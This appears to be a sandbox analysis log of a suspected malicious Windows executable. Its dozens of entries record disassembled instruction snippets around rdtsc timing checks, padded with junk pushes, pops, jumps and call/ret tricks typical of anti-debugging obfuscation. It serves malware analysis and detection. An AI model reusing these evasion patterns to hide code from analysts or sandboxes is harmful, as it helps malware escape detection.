Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180C5C0 second address: 180C601 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC69CFD56E6h 0x00000008 jmp 00007FC69CFD56ECh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f je 00007FC69CFD56F2h 0x00000015 jg 00007FC69CFD56E6h 0x0000001b jns 00007FC69CFD56E6h 0x00000021 push esi 0x00000022 jmp 00007FC69CFD56EFh 0x00000027 pop esi 0x00000028 popad 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c push esi 0x0000002d pop esi 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180C601 second address: 180C605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180C9F9 second address: 180CA03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180CA03 second address: 180CA09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180CA09 second address: 180CA0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180CA0D second address: 180CA19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180CBBA second address: 180CBC1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D2817 second address: 17D2842 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D533901h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a js 00007FC69D5338F8h 0x00000010 push eax 0x00000011 pop eax 0x00000012 pushad 0x00000013 jmp 00007FC69D5338FAh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D2842 second address: 17D2848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180CE30 second address: 180CE4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC69D5338F6h 0x0000000a popad 0x0000000b pushad 0x0000000c jo 00007FC69D5338F6h 0x00000012 jng 00007FC69D5338F6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180CE4A second address: 180CE54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180CE54 second address: 180CE87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC69D5338F6h 0x0000000a popad 0x0000000b jmp 00007FC69D533907h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC69D5338FEh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180CE87 second address: 180CE8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180D403 second address: 180D43C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jng 00007FC69D5338F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pushad 0x0000000e push edi 0x0000000f jmp 00007FC69D533906h 0x00000014 jmp 00007FC69D533900h 0x00000019 pop edi 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180D43C second address: 180D442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180D5DE second address: 180D5FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69D533907h 0x00000009 jc 00007FC69D5338F6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180D5FF second address: 180D603 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180D89C second address: 180D8AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC69D5338FBh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1811E81 second address: 1811E87 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1811E87 second address: 1811EA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D533907h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1811EA9 second address: 1811EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1811EAD second address: 1811EBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D5338FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1811EBB second address: 1811ED8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CFD56F9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181064A second address: 1810652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1819F5B second address: 1819F7B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC69CFD56E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FC69CFD56F0h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181A4C3 second address: 181A4F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D533909h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC69D5338FEh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181A4F0 second address: 181A4FA instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC69CFD56E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181A4FA second address: 181A500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181A500 second address: 181A504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181C8F5 second address: 181C920 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FC69D5338F6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC69D533909h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181CABC second address: 181CAC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181CAC3 second address: 181CAD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181CAD0 second address: 181CAD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181CBAF second address: 181CBB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181CD1C second address: 181CD4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 jne 00007FC69CFD56E6h 0x0000000c pop edi 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 push ecx 0x00000011 jmp 00007FC69CFD56F8h 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a pop edi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181D3BB second address: 181D3D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D533905h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181E46F second address: 181E473 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181F4CA second address: 181F52B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007FC69D5338F8h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push ebx 0x00000026 call 00007FC69D5338F8h 0x0000002b pop ebx 0x0000002c mov dword ptr [esp+04h], ebx 0x00000030 add dword ptr [esp+04h], 00000018h 0x00000038 inc ebx 0x00000039 push ebx 0x0000003a ret 0x0000003b pop ebx 0x0000003c ret 0x0000003d push 00000000h 0x0000003f mov dword ptr [ebp+122D2E8Ch], ecx 0x00000045 xchg eax, ebx 0x00000046 je 00007FC69D533915h 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181F52B second address: 181F52F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181F52F second address: 181F55E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D533903h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007FC69D533905h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18208D1 second address: 18208FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FC69CFD56EEh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC69CFD56F3h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18208FD second address: 1820901 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1821284 second address: 182129A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC69CFD56EDh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1821047 second address: 182104C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1821CCD second address: 1821CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC69CFD56F5h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1822796 second address: 1822805 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov si, E574h 0x0000000d push ebx 0x0000000e xor dword ptr [ebp+122D228Bh], eax 0x00000014 pop esi 0x00000015 push 00000000h 0x00000017 mov di, 2564h 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push edx 0x00000020 call 00007FC69D5338F8h 0x00000025 pop edx 0x00000026 mov dword ptr [esp+04h], edx 0x0000002a add dword ptr [esp+04h], 00000014h 0x00000032 inc edx 0x00000033 push edx 0x00000034 ret 0x00000035 pop edx 0x00000036 ret 0x00000037 call 00007FC69D5338FCh 0x0000003c jnp 00007FC69D5338FCh 0x00000042 pop edi 0x00000043 xchg eax, ebx 0x00000044 push eax 0x00000045 jmp 00007FC69D5338FFh 0x0000004a pop eax 0x0000004b push eax 0x0000004c js 00007FC69D533904h 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1822805 second address: 1822809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18219D9 second address: 18219DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17E3507 second address: 17E3523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jns 00007FC69CFD56E6h 0x00000014 pop edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push edi 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1825A58 second address: 1825A62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FC69D5338F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1825A62 second address: 1825A93 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC69CFD56E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FC69CFD56EEh 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FC69CFD56EAh 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1825A93 second address: 1825A97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1825A97 second address: 1825AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC69CFD56EDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1825AAE second address: 1825ACD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC69D533904h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1825ACD second address: 1825AD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1826C66 second address: 1826D01 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jl 00007FC69D5338F6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FC69D5338F8h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 mov ebx, dword ptr [ebp+122D3C31h] 0x0000002f push 00000000h 0x00000031 add dword ptr [ebp+122D1BEFh], ebx 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push esi 0x0000003c call 00007FC69D5338F8h 0x00000041 pop esi 0x00000042 mov dword ptr [esp+04h], esi 0x00000046 add dword ptr [esp+04h], 0000001Ch 0x0000004e inc esi 0x0000004f push esi 0x00000050 ret 0x00000051 pop esi 0x00000052 ret 0x00000053 mov ebx, dword ptr [ebp+122D3B7Dh] 0x00000059 mov dword ptr [ebp+1245AF4Ch], ebx 0x0000005f xchg eax, esi 0x00000060 jng 00007FC69D533910h 0x00000066 jg 00007FC69D53390Ah 0x0000006c push eax 0x0000006d push eax 0x0000006e push edx 0x0000006f push eax 0x00000070 pushad 0x00000071 popad 0x00000072 pop eax 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1826D01 second address: 1826D07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1826D07 second address: 1826D0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1828CAC second address: 1828CC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1828CC0 second address: 1828CCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FC69D5338F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1826EA1 second address: 1826EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC69CFD56F1h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 182ACAA second address: 182AD2D instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC69D5338F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c jg 00007FC69D533906h 0x00000012 nop 0x00000013 mov edi, dword ptr [ebp+122D3B41h] 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edx 0x0000001e call 00007FC69D5338F8h 0x00000023 pop edx 0x00000024 mov dword ptr [esp+04h], edx 0x00000028 add dword ptr [esp+04h], 0000001Ch 0x00000030 inc edx 0x00000031 push edx 0x00000032 ret 0x00000033 pop edx 0x00000034 ret 0x00000035 mov di, si 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push edx 0x0000003d call 00007FC69D5338F8h 0x00000042 pop edx 0x00000043 mov dword ptr [esp+04h], edx 0x00000047 add dword ptr [esp+04h], 00000017h 0x0000004f inc edx 0x00000050 push edx 0x00000051 ret 0x00000052 pop edx 0x00000053 ret 0x00000054 mov ebx, 784F16DAh 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c jg 00007FC69D5338F8h 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 182AD2D second address: 182AD3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CFD56EAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 182AE81 second address: 182AE8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC69D5338F6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 182AE8C second address: 182AE92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 182AE92 second address: 182AE96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 182CD94 second address: 182CD9A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D78D7 second address: 17D78F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D533909h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 182CD9A second address: 182CDA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D78F4 second address: 17D7931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC69D533903h 0x0000000b jno 00007FC69D5338FCh 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007FC69D533900h 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D7931 second address: 17D7935 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D7935 second address: 17D793B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 182F337 second address: 182F33B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 182F5BF second address: 182F5D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC69D5338FDh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D93D5 second address: 17D93F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 jmp 00007FC69CFD56EBh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18360D3 second address: 18360D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18360D9 second address: 18360DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18391C3 second address: 18391E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D5338FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007FC69D5338F6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183A182 second address: 183A186 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183A186 second address: 183A1FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007FC69D5338F8h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 xor dword ptr [ebp+12469645h], edx 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007FC69D5338F8h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 0000001Dh 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 xchg eax, esi 0x00000049 jmp 00007FC69D5338FDh 0x0000004e push eax 0x0000004f js 00007FC69D533904h 0x00000055 push eax 0x00000056 push edx 0x00000057 push edi 0x00000058 pop edi 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1830770 second address: 1830777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1830834 second address: 1830853 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D533903h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007FC69D5338F6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1830853 second address: 1830878 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b jmp 00007FC69CFD56F9h 0x00000010 pop ecx 0x00000011 rdtsc
